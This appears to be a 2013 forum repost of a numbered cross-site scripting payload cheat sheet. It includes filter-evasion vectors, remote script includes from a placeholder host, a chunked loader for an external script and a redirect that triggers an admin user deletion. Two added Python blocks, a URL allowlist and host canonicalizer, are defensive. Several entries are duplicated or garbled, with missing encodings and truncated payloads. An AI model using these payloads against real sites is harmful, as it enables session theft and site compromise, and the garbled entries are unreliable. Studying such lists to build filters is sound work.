XSS Attack Roundup

Posted on 2013-4-19 19:22:37
It seems there is not much material on XSS here on t00ls, so when I saw something good I copied it over; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (use an encoding calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (use an encoding calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, without semicolons (use an encoding calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (use an encoding calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting "javascript"
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting "javascript"
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters have basically no effect domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the IMG tag's JavaScript
<IMG SRC=" javascript:alert('XSS');">
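Entries (3) to (19) all exploit the same weakness: a filter that looks for the literal string javascript: before the browser has decoded character references and discarded control characters. The following Python is an added example, not code from the original post: it normalizes a URL attribute value the way a browser would and then applies a scheme allowlist. The sample values are constructed to mirror the entries above (and also cover decimal and hex references with and without semicolons); example.com and the file names are placeholders.

```python
import html
import re

ALLOWED_SCHEMES = {"http", "https"}
# A scheme is an ASCII letter, then letters/digits/'+'/'-'/'.', followed by ':'.
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")

def normalize_url(value: str) -> str:
    """Approximate what the browser ends up with: decode HTML character references
    (numeric ones need no trailing semicolon), drop ASCII control characters and
    whitespace, which browsers strip or tolerate inside a scheme, then lowercase."""
    decoded = html.unescape(value)
    return re.sub(r"[\x00-\x20\x7f]", "", decoded).lower()

def is_safe_url(value: str) -> bool:
    """Allowlist check: accept only relative URLs or http/https after normalization;
    javascript:, vbscript:, data: and the rest are rejected however they are written."""
    match = SCHEME_RE.match(normalize_url(value))
    if match is None:
        return True  # no scheme: relative URL (protocol-relative //host included)
    return match.group(1) in ALLOWED_SCHEMES

def naive_blacklist(value: str) -> bool:
    """The kind of filter the list above defeats: rejects only the literal substring."""
    return "javascript:" not in value.lower()

# Constructed attribute values modelled on entries (3) to (19) and (40) of the list,
# mapped to the verdict a correct filter should give (True = allowed).
SAMPLE_VALUES = {
    "javascript:alert('XSS')": False,                         # (3)
    "JaVaScRiPt:alert('XSS')": False,                         # (4) mixed case
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)": False,  # (5)
    "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert(1)": False,   # (10)
    "jav\tascript:alert(1)": False,                           # (11) raw tab
    "jav&#x09;ascript:alert(1)": False,                       # (12) encoded tab
    "jav&#x0A;ascript:alert(1)": False,                       # (13) encoded newline
    "java\0script:alert(1)": False,                           # (17) null byte
    " javascript:alert(1)": False,                            # (19) leading space
    "vbscript:msgbox(1)": False,                              # (40)
    "http://example.com/a.png": True,
    "https://example.com/?next=a:b": True,  # ':' after the authority is not a scheme
    "/images/logo.png": True,
}

def evaluate(values=SAMPLE_VALUES) -> dict:
    """Run the allowlist over the samples; returns value -> verdict."""
    return {v: is_safe_url(v) for v in values}
```

The allowlist only decides the scheme; the host part of an accepted http URL still needs its own checks, which entries (70) to (76) below make clear.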
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) ActionScript in Flash can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command 2 (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting "http:"
<A HREF="//www.google.com/">XSS</A>
(75) Omitting "www"
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
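Entries (70) to (76) show that one host can be written in several notations, so a link filter, allowlist or blocklist that compares the raw string will miss them. The following Python is an added example, not code from the original post: it canonicalizes a hostname before any comparison, turning IPv4 literals in decimal, hexadecimal, octal or mixed form into a dotted quad, dropping the trailing dot of an absolute DNS name, and removing the tabs and newlines browsers ignore. It relies only on the standard library; the sample URLs in the test are constructed from the entries above.

```python
import re
from urllib.parse import urlparse

def parse_ipv4_literal(host: str):
    """Interpret an IPv4 host the way inet_aton-style parsers (and browsers) do:
    one to four dot-separated parts, each decimal, octal (leading 0) or hex (0x),
    with the last part filling all remaining bytes. Returns the dotted quad, or
    None when the host is not an IPv4 literal (for example a DNS name)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]*", part):
            values.append(int(part[2:] or "0", 16))   # (71) hex: 0xc0
        elif re.fullmatch(r"0[0-7]*", part):
            values.append(int(part, 8))               # (72) octal: 0300
        elif re.fullmatch(r"[1-9][0-9]*", part):
            values.append(int(part, 10))              # (70) decimal: 3232235521
        else:
            return None
    *head, last = values
    remaining = 4 - len(head)                         # bytes the last part covers
    if any(v > 255 for v in head) or last >= 1 << (8 * remaining):
        return None
    number = last
    for i, v in enumerate(head):
        number |= v << (8 * (3 - i))
    return ".".join(str((number >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def canonical_host(url: str):
    """Hostname to compare against an allow/deny list: tabs and newlines removed
    (browsers ignore them, see (73)), lowercase, trailing dot dropped (76), and
    IPv4 literals in any notation (70)-(73) rewritten as a plain dotted quad."""
    cleaned = re.sub(r"[\t\r\n]", "", url)
    host = urlparse(cleaned).hostname      # urlparse already lowercases it
    if host is None:
        return None
    host = host.rstrip(".")
    return parse_ipv4_literal(host) or host
```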